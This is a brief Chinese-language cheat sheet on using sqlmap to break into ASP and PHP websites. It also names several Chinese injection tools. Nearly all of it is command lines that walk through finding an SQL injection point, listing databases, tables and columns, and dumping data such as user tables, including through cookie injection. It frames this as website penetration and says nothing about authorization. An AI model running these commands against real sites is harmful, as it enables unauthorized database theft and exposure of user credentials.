SQLMAP介绍

ASP网站渗透

常用： 明小子，啊D，NBSI，御剑

asp网站常用access（文件数据库）

sqlmap -u "网站"
-u检测是否存在注入漏洞，返回数据库名
sqlmap -u "网站" --tables
-tables猜解所有表名

找到用户表

sqlmap -u "网站" --columns -T "表名"
–columns根据表猜解列名

sqlmap -u "网站" --dump -C "列名" -T "表名"
–dump下载数据

PHP网站渗透

检测
sqlmap -u "网站"

sqlmap -u "网站" --is-dba

列出所有数据库
sqlmap -u "网站" -dbs

查找自己数据库
sqlmap -u "网站" --current-db

猜解所有表名，根据数据库查询
sqlmap -u "网站" --tables -D"数据库名"

sqlmap -u "网站" --columns -T "表名" -D "数据库名"

查询列的字段
sqlmap -u "网站" --dump -C "列名" -T "表名" -D "数据库名"

Cookie注入

sqlmap -u "网站" --cookie "id=参数" --level 2
cookie注入需要提升权限为2

猜解
sqlmap -u "网站" --tables --cookie "id=参数" --level 2

sqlmap -u "网站" --columns -T "表名" --cookie "id=参数" --level 2

sqlmap -u "网站" --dump -C "列名" -T "表名" --cookie "id=参数" --level 2